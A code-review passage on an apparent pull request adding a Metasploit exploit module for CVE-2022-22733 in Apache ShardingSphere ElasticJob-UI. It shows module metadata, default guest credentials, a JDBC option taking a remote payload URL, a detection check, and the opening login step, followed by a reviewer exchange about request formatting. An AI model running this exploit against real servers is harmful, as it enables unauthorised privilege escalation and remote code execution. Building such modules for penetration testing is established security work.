modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb

```diff
@@ -0,0 +1,149 @@
+require 'msf/core'
+require 'net/http'
+require 'openssl'
+require 'uri'
+require 'json'
+require 'base64'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache ShardingSphere ElasticJob-UI CVE-2022-22733 Exploit',
+      'Description'    => %q{
+        This module exploits a vulnerability in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733.
+      },
+      'Author'         => [ 'Zeyad Azima' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2022-22733' ],
+          ['URL', 'https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce'],
+          ['URL', 'https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation'],
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8088,
+          'SSL'   => false,
+          'DisablePayloadHandler' => true
+        },
+      'Platform'       => ['win', 'linux'],
+      'Targets'        => [ [ 'Automatic', {} ] ],
+      'DisclosureDate' => '2022-01-20',
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'The username to authenticate with', 'guest']),
+        OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'guest']),
+        OptString.new('JDBC', [ true, 'Payload URL for JDBC Attack ex: http://ip:8000/poc.sql' ])
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'HEAD',
+      'uri'    => '/api/login',
+    })
+
+    if res && res.code == 200
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  rescue ::Rex::ConnectionError
+    print_error("#{peer} - Connection failed")
+    return Exploit::CheckCode::Unknown
+  end
+
+
+  def exploit
+    print_status('Attempting to authenticate...')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/api/login',
+      'ctype'  => 'application/json',
+      'data'   => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
```

Comment:
Please, use `vars_post` instead. This would handle everything for you, including encoding:
```suggestion
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }
```

Reply:
@cdelafuente-r7 Tried your suggestion but this didn't in fact format the request as you expected. Seems like the author's original suggestion may be needed.